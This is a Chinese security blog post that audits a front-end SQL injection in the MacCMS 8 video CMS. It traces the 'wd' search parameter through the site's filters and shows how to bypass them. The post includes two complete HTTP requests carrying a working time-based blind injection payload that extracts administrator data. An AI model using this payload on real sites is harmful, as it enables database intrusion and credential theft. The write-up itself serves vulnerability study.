送你们几个字!对!就是MACCMS注入!
文末答题赢福利
0x00 相关信息
源码信息:maccms8_mfb(苹果CMS视频分享程序 8.0 | 2017.09.27 发布) 源码下载:http://www.mycodes.net/47/7798.htm(官网http://www.maccms.com/down.html 已悄悄修复╮(╯▽╰)╭) 问题位置:maccms8_mfbinccommonfunction.php中htmlEncode方法 漏洞类型:前台SQL注入漏洞
0x01 审计过程
1.首先在maccms8_mfbincmodulevod.php文件中的第93-98行的代码当$method=search成立的时候便回进入到be("all", "wd")获取请求中wd参数的值,并使用chkSql($wd)方法对$wd进行安全处理。
2.跟入be方法在maccms8_mfbinccommonfunction.php文件中的第266-294行中可看到该方法是对GET,POST,REQUEST接收到的参数进行addslashes的转义处理,根据上一步可以知道be("all", "wd")是,使用REQUEST接收wd参数的值并使用addslashes函数进行转义处理。
3.回到maccms8_mfbincmodulevod.php第96行再跟入chkSql方法,在maccms8_mfbinccommon360_safe3.php文件中的第27-43行中可以看到该方法是将接收到的变量进行循环urldecode直到解出原文为止,解出后再丢进StopAttack进行处理,处理完成后返回htmlEncode($s)的值。
4.跟入StopAttack方法在maccms8_mfbinccommon360_safe3.php文件中的第12-26行中可以看到该方法是使用接收到的正则$ArrFiltReq进行安全处理。
5.跟入$getfilter在maccms8_mfbinccommon360_safe3.php文件中的第57-61行可以看到该方法是检测GET,POST,COOKIE中的关键字的拦截规则,且该检测规则存在被绕过的问题。
6.回到maccms8_mfbinccommon360_safe3.php的第42行再跟入htmlEncode方法,在maccms8_mfbinccommonfunction.php文件中的572-586行可以看到该方法是对&,’,空格,”,TAB,回车,换行,大小于号进行实体化的转换,此处没有对其他的空白字符和反斜杠进行处理,可以被绕过。
7.回到maccms8_mfbincmodulevod.php第98行再跟入$tpl->P["wd"] = $wd;,在maccms8_mfbinccommontemplate.php文件的第2372行看到$tpl被创建的位置,且class AppTpl也是在当前文件被创建的,跟踪P["wd"]数据发现传递给了$lp['wd'],然后跟踪$lp['wd'],在如下两处进行了SQL的拼接处理,所以存在SQL注入,且是单引号字符型注入。
第一处:需要请求m参数为m=vod-search的时候触发。
第二处:需要请求m参数为m=art-search的时候触发。
0x02 漏洞复现
在上述的分析过程中可以知道htmlEncode仅对&,’,空格,”,TAB,回车,换行,大小于号进行实体化的转换,可以使用%0b绕过,但是根据0x01中的第7步可以知道是字符型注入,需要闭合单引号,htmlEncode又把单引号进行的实体化,所以可以转换思路,如下两个SQL语句拼接时候$lp['wd']在SQL语句中可以控制两个位置,因此可以传入反斜杠进行单引号的转义和闭合,又由于0x01中第2步得知REQUEST请求使用了addslashes函数进行转义处理,0x01中的第3步中使用urldecode进行解码,所以可以使用双url编码绕过addslashes函数。
类似如下的操作:
最终的利用payload,mac_vod和mac_art两张表中要有数据。
在进行数据的枚举时候需要将cookie 中的PHPSESSID删掉,否则会限制快速访问,如下是对应的EXP,获取的正确数据变会延迟5s回显。
POST /code/maccms8_mfb/index.php?m=vod-search HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Connection: keep-alive
Upgrade-Insecure-Requests: 1
wd=))||if((select%0b(select(m_name)``from(mac_manager))regexp(0x5e61)),(`sleep`(5)),0)#%25%35%63
POST /code/maccms8_mfb/index.php?m=art-search HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Connection: keep-alive
Upgrade-Insecure-Requests: 1
wd=))||if((select%0b(select(m_name)``from(mac_manager))regexp(0x5e61)),(`sleep`(5)),0)#%25%35%63
0x03 小总结
用反斜杠转义单引号的方法适用当用户可控的位置有两处及以上,且在同一SQL语句中被拼接,当然前提是反斜杠未被处理,本篇就是这种情况,本篇漏洞复现的源码官方已经悄然修复,所以大家要进行漏洞学习的话请前往http://www.mycodes.net/47/7798.htm进行源码的下载,当然如果大家有更好的思路欢迎一起讨论交流。
- 厚土Go学习笔记 | 29. 接口
- MySQL删除数据的简单尝试 (r7笔记第98天)
- 简单易学的机器学习算法——lasso
- 优化算法——差分进化算法(DE)
- 通过shell脚本批量验证dataguard的有效性(r7笔记第96天)
- JavaWeb17-案例之ajax(Java真正的全栈开发)
- JavaWeb15-DBUtils(Java真正的全栈开发)
- 利用Theano理解深度学习——Multilayer Perceptron
- JavaWeb14-事务,连接池(Java正在的全栈开发)
- 利用Theano理解深度学习——Logistic Regression
- JavaWeb13-设计模式案例实现(Java真正的全栈开发)
- 运维平台的建设思考-元数据管理(三)(r8笔记第15天)
- JavaWeb12-JSP, EL表达式,JSTL标签
- JavaWeb11-jsp.cookie.session(1)
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- 【DB宝15】生产环境中,如何利用DG的备库来异机还原一个新库?
- Java命令执行学习笔记
- SAP UI5应用DatePicker控件的设计明细
- 如何根据自己的实际需求开发属于自己的sublime text插件
- Sony Z13 系列笔记本安装 NVIDIA 官方最新版显卡驱动程序
- 通过网页进行 iOS 应用内部分发
- 【DB笔试面试853】在Oracle中,什么是手动建库?手动建库有哪些步骤?
- 使用 Intel HAXM 为 Android 模拟器加速,媲美真机
- NHibernate 使用 SqlQuery
- 谈谈 INotifyPropertyChanged 的实现
- C 语言小知识
- 使用代码配置 NHibernate
- [Introduction]Go特殊的引用类型:值传递/指针传递/引用传递
- PythonforResearch | 0_语法基础
- iOS 系统中的视图动画